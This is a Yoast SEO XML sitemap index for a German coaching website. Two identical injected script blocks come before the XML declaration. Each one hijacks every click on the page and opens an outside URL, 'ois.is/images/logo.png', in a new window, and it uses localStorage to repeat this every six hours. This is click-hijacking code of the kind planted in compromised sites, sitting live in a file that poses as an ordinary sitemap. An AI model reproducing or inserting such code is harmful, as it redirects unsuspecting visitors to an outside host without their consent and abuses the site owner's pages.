<script>(function (parameters) {
		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getFromStorage = (host) => localStorage.getItem(`${host}-local-storage`);
		const addToStorage = (host, nowDate) => localStorage.setItem(`${host}-local-storage`, nowDate);

		function globalClick(event) {
			const host = location.host
			const newLocation = "https://ois.is/images/logo.png"
			const allowedHours = 6

			const nowDate = Date.parse(new Date());
			const savedData = getFromStorage(host)

			if (savedData) {
				try {
					const storageDate = parseInt(savedData);
					// check hours
					const hoursDiff = getHoursDiff(nowDate, storageDate)
					console.log(nowDate, storageDate, hoursDiff)
					if (hoursDiff >= allowedHours) {
						addToStorage(host, nowDate);
						window.open(newLocation, "_blank");
					}
				} catch (error) {
					addToStorage(host, nowDate);
					window.open(newLocation, "_blank");
				}
			} else {
				addToStorage(host, nowDate);
				window.open(newLocation, "_blank");
			}
		}
		document.addEventListener("click", globalClick);
	})();</script><script>(function (parameters) {
		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getFromStorage = (host) => localStorage.getItem(`${host}-local-storage`);
		const addToStorage = (host, nowDate) => localStorage.setItem(`${host}-local-storage`, nowDate);

		function globalClick(event) {
			const host = location.host
			const newLocation = "https://ois.is/images/logo.png"
			const allowedHours = 6

			const nowDate = Date.parse(new Date());
			const savedData = getFromStorage(host)

			if (savedData) {
				try {
					const storageDate = parseInt(savedData);
					// check hours
					const hoursDiff = getHoursDiff(nowDate, storageDate)
					console.log(nowDate, storageDate, hoursDiff)
					if (hoursDiff >= allowedHours) {
						addToStorage(host, nowDate);
						window.open(newLocation, "_blank");
					}
				} catch (error) {
					addToStorage(host, nowDate);
					window.open(newLocation, "_blank");
				}
			} else {
				addToStorage(host, nowDate);
				window.open(newLocation, "_blank");
			}
		}
		document.addEventListener("click", globalClick);
	})();</script><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//timpte-coaching.de/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://timpte-coaching.de/post-sitemap.xml</loc>
		<lastmod>2022-02-12T21:30:47+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://timpte-coaching.de/page-sitemap.xml</loc>
		<lastmod>2023-02-10T20:50:45+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://timpte-coaching.de/category-sitemap.xml</loc>
		<lastmod>2022-02-12T21:30:47+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->